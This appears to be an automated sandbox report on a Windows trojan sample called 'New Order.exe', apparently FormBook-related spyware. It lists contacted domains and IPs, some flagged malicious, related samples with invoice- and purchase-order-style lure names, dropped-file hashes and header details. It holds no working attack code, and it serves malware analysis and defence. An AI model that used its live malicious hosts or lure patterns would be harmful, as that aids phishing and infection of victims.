                                            http://www.litespeedtech.com/error-pagePresentationHost.exe, 0000000E.00000002.2438416479.0000000004FB4000.00000004.10000000.00040000.00000000.sdmp, 9WAxm5F77VClmSoGxi.exe, 0000000F.00000002.2434352984.0000000002804000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.1963615507.000000001EFD4000.00000004.80000000.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.tiro.comNew Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://ac.ecosia.org?q=PresentationHost.exe, 0000000E.00000002.2440222271.000000000755E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=PresentationHost.exe, 0000000E.00000002.2440222271.000000000755E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.fontbureau.com/designersNew Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://www.chiark.greenend.org.uk/~sgtatham/putty/0New Order.exefalse
                                                      high
                                                      http://www.carterandcone.comlNew Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.sajatypeworks.comNew Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.typography.netDNew Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.fontbureau.com/designers/cabarga.htmlNNew Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.founder.com.cn/cn/cTheNew Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.galapagosdesign.com/staff/dennis.htmNew Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.founder.com.cn/cnNew Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.ecosia.org/newtab/v20PresentationHost.exe, 0000000E.00000002.2440222271.000000000755E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.fontbureau.com/designers/frere-user.htmlNew Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://duckduckgo.com/chrome_newtabv20PresentationHost.exe, 0000000E.00000002.2440222271.000000000755E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchPresentationHost.exe, 0000000E.00000002.2440222271.000000000755E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://www.jiyu-kobo.co.jp/New Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.galapagosdesign.com/DPleaseNew Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.fontbureau.com/designers8New Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.fonts.comNew Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.cssPresentationHost.exe, 0000000E.00000002.2438416479.000000000546A000.00000004.10000000.00040000.00000000.sdmp, 9WAxm5F77VClmSoGxi.exe, 0000000F.00000002.2434352984.0000000002CBA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://www.urwpp.deDPleaseNew Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.zhongyicts.com.cnNew Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameNew Order.exe, 00000000.00000002.1285369631.0000000002713000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.sakkal.comNew Order.exe, 00000000.00000002.1302377017.0000000006862000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=PresentationHost.exe, 0000000E.00000002.2440222271.000000000755E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://gemini.google.com/app?q=PresentationHost.exe, 0000000E.00000002.2440222271.000000000755E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://www.google.com/images/branding/product/ico/googleg_alldpPresentationHost.exe, 0000000E.00000002.2440222271.000000000755E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    • No. of IPs < 25%
                                                                                                    • 25% < No. of IPs < 50%
                                                                                                    • 50% < No. of IPs < 75%
                                                                                                    • 75% < No. of IPs
                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                    104.21.18.45
                                                                                                    www.eedpisalgenius.shopUnited States
                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                    142.0.133.149
                                                                                                    www.79456217.xyzUnited States
                                                                                                    54600PEGTECHINCUSfalse
                                                                                                    203.161.42.73
                                                                                                    www.thrivay.websiteMalaysia
                                                                                                    45899VNPT-AS-VNVNPTCorpVNtrue
                                                                                                    51.222.255.207
                                                                                                    www.playav.mobiFrance
                                                                                                    16276OVHFRfalse
                                                                                                    77.95.113.182
                                                                                                    sixfiguredigital.groupUnited Kingdom
                                                                                                    16303PROGRESSIVEGBtrue
                                                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                                                    Analysis ID:1633466
                                                                                                    Start date and time:2025-03-10 11:56:13 +01:00
                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                    Overall analysis duration:0h 8m 9s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:full
                                                                                                    Cookbook file name:default.jbs
                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                    Number of analysed new started processes analysed:17
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:2
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Sample name:New Order.exe
                                                                                                    Detection:MAL
                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@12/7@5/5
                                                                                                    EGA Information:
                                                                                                    • Successful, ratio: 83.3%
                                                                                                    HCA Information:
                                                                                                    • Successful, ratio: 90%
                                                                                                    • Number of executed functions: 108
                                                                                                    • Number of non-executed functions: 274
                                                                                                    Cookbook Comments:
                                                                                                    • Found application associated with file extension: .exe
                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                    • Excluded IPs from analysis (whitelisted): 23.60.203.209, 52.149.20.212
                                                                                                    • Excluded domains from analysis (whitelisted): a-ring-fallback.msedge.net, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                    TimeTypeDescription
                                                                                                    06:57:12API Interceptor1x Sleep call for process: New Order.exe modified
                                                                                                    06:57:22API Interceptor13x Sleep call for process: powershell.exe modified
                                                                                                    06:58:36API Interceptor721378x Sleep call for process: PresentationHost.exe modified
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    104.21.18.45Revised Invoice Vt-1307701765400112977.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.eedpisalgenius.shop/3391/
                                                                                                    URGENT REQUEST FOR QUOTATION.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.eedpisalgenius.shop/i449/
                                                                                                    142.0.133.149z15NEWORDERSUPPLY0490402.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.79456217.xyz/ldaj/
                                                                                                    PURCHASE-ORDER-SINCOAUTOMATION-PO322357781-Ref 6421SINCO-AUTOMATION4533.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.79456217.xyz/ldaj/
                                                                                                    URGENT REQUEST FOR QUOTATION.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.79456217.xyz/q7ap/
                                                                                                    employee performance report.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.79456217.xyz/f57e/
                                                                                                    PO-000172483.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.79456217.xyz/y544/
                                                                                                    PO-000172483.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.79456217.xyz/y544/
                                                                                                    PO-000172483.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.79456217.xyz/y544/
                                                                                                    203.161.42.73N4533DWG.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.livream.live/drnv/
                                                                                                    SUPPLY ORDERS 934784.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.livream.live/drnv/
                                                                                                    CV Jennyfer Rojas.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.livream.live/8btb/
                                                                                                    z15NEWORDERSUPPLY0490402.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.livream.live/drnv/
                                                                                                    CV Jennyfer Rojas.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.livream.live/8btb/
                                                                                                    DHL-0700A00763441_25022025.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.livream.live/8btb/
                                                                                                    PURCHASE-ORDER-SINCOAUTOMATION-PO322357781-Ref 6421SINCO-AUTOMATION4533.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.livream.live/drnv/
                                                                                                    URGENT REQUEST FOR QUOTATION.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.thrivay.website/04t4/
                                                                                                    PAYMENT RECEIPT_USD21,000.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.nevath.xyz/pc8v/
                                                                                                    SHARP_CAMSCANNER20251601.PDF.vbsGet hashmaliciousFormBook, PureLog Stealer, zgRATBrowse
                                                                                                    • www.thrivay.website/aaep/
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    www.thrivay.websiteURGENT REQUEST FOR QUOTATION.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 203.161.42.73
                                                                                                    SHARP_CAMSCANNER20251601.PDF.vbsGet hashmaliciousFormBook, PureLog Stealer, zgRATBrowse
                                                                                                    • 203.161.42.73
                                                                                                    www.eedpisalgenius.shopxtQdwMwu86.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 172.67.180.97
                                                                                                    SEA WAYBILL, BL, INVOICE & PACKING LIST.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 172.67.180.97
                                                                                                    Revised Invoice Vt-1307701765400112977.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 104.21.18.45
                                                                                                    URGENT REQUEST FOR QUOTATION.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 104.21.18.45
                                                                                                    www.79456217.xyzz15NEWORDERSUPPLY0490402.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 142.0.133.149
                                                                                                    PURCHASE-ORDER-SINCOAUTOMATION-PO322357781-Ref 6421SINCO-AUTOMATION4533.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 142.0.133.149
                                                                                                    URGENT REQUEST FOR QUOTATION.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 142.0.133.149
                                                                                                    employee performance report.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 142.0.133.149
                                                                                                    PO-000172483.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 142.0.133.149
                                                                                                    PO-000172483.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 142.0.133.149
                                                                                                    PO-000172483.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 142.0.133.149
                                                                                                    www.playav.mobiNEW PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 51.222.255.207
                                                                                                    SERVICE PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 51.222.255.207
                                                                                                    PO For Bulk Order.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 51.222.255.207
                                                                                                    PO For Bulk Order.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 51.222.255.207
                                                                                                    PO For Bulk Order.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 51.222.255.207
                                                                                                    URGENT REQUEST FOR QUOTATION.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 51.222.255.207
                                                                                                    RE DB-TST-PO-HT PO24105 ST24125.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 51.222.255.207
                                                                                                    PO24105 & ST24125.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 51.222.255.207
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    CLOUDFLARENETUShttps://courtyard.mspage.digitalGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 104.19.230.21
                                                                                                    justificante de transferencia09454545.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                    • 104.21.32.1
                                                                                                    https://cdn-facxxx.b-cdn.net/Get hashmaliciousUnknownBrowse
                                                                                                    • 104.16.117.116
                                                                                                    https://cdn-facxxx.b-cdn.net/Get hashmaliciousUnknownBrowse
                                                                                                    • 104.17.223.152
                                                                                                    REQUEST FOR QUOTATION.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 104.21.96.1
                                                                                                    ALfzrNn09x.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                    • 104.21.69.194
                                                                                                    PO 4500216219.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                    • 104.21.32.1
                                                                                                    http://gkac.eneturkylana.ruGet hashmaliciousUnknownBrowse
                                                                                                    • 172.67.220.135
                                                                                                    https://www.bing.com/ck/a?!&&p=1f19d163686421a1c4dee6e913a70b03975770d6678cc85aaa19399ddb9797c3JmltdHM9MTc0MDA5NjAwMA&ptn=3&ver=2&hsh=4&fclid=3f872805-fafa-613e-0c0e-3d8cfbee60c8&u=a1aHR0cHM6Ly9hbWFud2hvbmVlZGVkZ3JhY2UuY29tL2Fib3V0Lw#aHR0cHM6Ly81d2oua2dxb2d3cWUucnUvZnYwUkUv/$aree.sollis@abilitynetwork.comGet hashmaliciousUnknownBrowse
                                                                                                    • 188.114.96.3
                                                                                                    VNPT-AS-VNVNPTCorpVNN4533DWG.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 203.161.42.73
                                                                                                    nabspc.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 14.254.133.46
                                                                                                    nklarm5.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 123.19.47.238
                                                                                                    nklarm7.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 14.254.239.157
                                                                                                    jklx86.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 14.165.185.14
                                                                                                    nabarm7.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 14.167.246.137
                                                                                                    splm68k.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 14.238.234.246
                                                                                                    jklppc.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 14.237.86.18
                                                                                                    jklsh4.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 113.170.134.109
                                                                                                    nabppc.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 146.196.72.17
                                                                                                    PEGTECHINCUSF#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 154.201.91.246
                                                                                                    apep.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 156.247.76.131
                                                                                                    a.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 154.88.173.206
                                                                                                    1YDqrpKZwA.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 198.2.236.221
                                                                                                    1x165rHRi9.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 198.2.236.221
                                                                                                    nabppc.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 154.195.81.97
                                                                                                    cbr.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                    • 156.247.76.139
                                                                                                    RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 198.2.236.221
                                                                                                    nabx86.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 108.186.72.27
                                                                                                    z15NEWORDERSUPPLY0490402.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 142.0.133.149
                                                                                                    OVHFRSetup64.exeGet hashmaliciousPureCrypter, AsyncRATBrowse
                                                                                                    • 151.80.89.228
                                                                                                    Setup64.exeGet hashmaliciousPureCrypter, AsyncRATBrowse
                                                                                                    • 151.80.89.228
                                                                                                    nklspc.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 51.255.185.125
                                                                                                    nklsh4.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 164.132.129.125
                                                                                                    nabx86.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 51.254.195.241
                                                                                                    jklarm7.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 51.161.74.243
                                                                                                    apep.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 51.255.185.139
                                                                                                    apep.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 51.38.25.10
                                                                                                    apep.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 51.222.64.242
                                                                                                    SecuriteInfo.com.Trojan.PWS.Lumma.1819.32341.28310.exeGet hashmaliciousLummaC Stealer, RHADAMANTHYSBrowse
                                                                                                    • 91.134.9.160
                                                                                                    No context
                                                                                                    No context
                                                                                                    Process:C:\Users\user\Desktop\New Order.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1216
                                                                                                    Entropy (8bit):5.34331486778365
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                    Malicious:true
                                                                                                    Reputation:high, very likely benign file
                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1172
                                                                                                    Entropy (8bit):5.3550249375369265
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:3OWSKco4KmZjKbmOIKod6emN1s4RPQoU99t7J0gt/NKIl9iagu:eWSU4xympjms4RIoU99tK8NDv
                                                                                                    MD5:F5C607E507119C024A8457EB53A4EACA
                                                                                                    SHA1:E12BA3AFFE22D4699D53BBBFB38281EB20C79523
                                                                                                    SHA-256:B5C5E419F4854F669A4DF47860787886BC46FAC9C6DC97E39A9F118E79F55AEF
                                                                                                    SHA-512:1FA5B1E2F4850B41ED89237D6A2A5FBB7A04101B21362F118D39A4C9891F00F605AA49651DD1B5B37CFA954BD7A08A53F00F7ECAE4966ADA2207AD2DF995B597
                                                                                                    Malicious:false
                                                                                                    Preview:@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                    Process:C:\Windows\SysWOW64\PresentationHost.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                    Category:dropped
                                                                                                    Size (bytes):139264
                                                                                                    Entropy (8bit):0.951889861146889
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaWtPqfPk:CfJ6a9xpnQLqtzKWJntPqfM
                                                                                                    MD5:2791D27717CAB5981A0EA5AD07EE6B64
                                                                                                    SHA1:1ACFA3E6B2D3A682CA918D6C1AA4AEBFBA2D9B75
                                                                                                    SHA-256:A2D12FE1A445318E2A559FA65998843F50469BEDB41B0F8EBEF008DB6EEE1A7F
                                                                                                    SHA-512:74FE33DD01CD441635EA88876E743B755C1092EAE29C8CA71E108995550C7994B1911295FC68F8B6688F0AC1CDB9313FC9A6714FB65BEA3F4956865978006E6F
                                                                                                    Malicious:false
                                                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Entropy (8bit):7.8890058848928275
                                                                                                    TrID:
                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                    File name:New Order.exe
                                                                                                    File size:717'320 bytes
                                                                                                    MD5:3bfdf4ebc873d0b4beefe9c37486bae6
                                                                                                    SHA1:c07522e9f1497df65771d960f9a0c68d70e2fdff
                                                                                                    SHA256:319fff87d2654e260489db6ed6065d73aef9b0ae8435b2f9b79ececb32a77fb9
                                                                                                    SHA512:c12c01d9d7137b2b73200795078e72ee27b99fc1286d6c73f86ada2443370e9152e824c3a0df56e93853b7beeffa3fc7a516b08c90a53603f252eca00725c376
                                                                                                    SSDEEP:12288:Ff9REKLCMH2+MDGcXPlnKFQVwyoxu3h0RQNVNvDuvKAI8eCtaSuKO71kR:bKcUkbjU3WSVZeOCbuKO7I
                                                                                                    TLSH:24E41294B959D053CE904BB00976E7764BB6EF9CF020C3D349EDECEB38863E52959242
                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...].................0...... ........... ........@.. ....................................`................................
                                                                                                    Icon Hash:0f6961f09859710f
                                                                                                    Entrypoint:0x4ab8a2
                                                                                                    Entrypoint Section:.text
                                                                                                    Digitally signed:true
                                                                                                    Imagebase:0x400000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
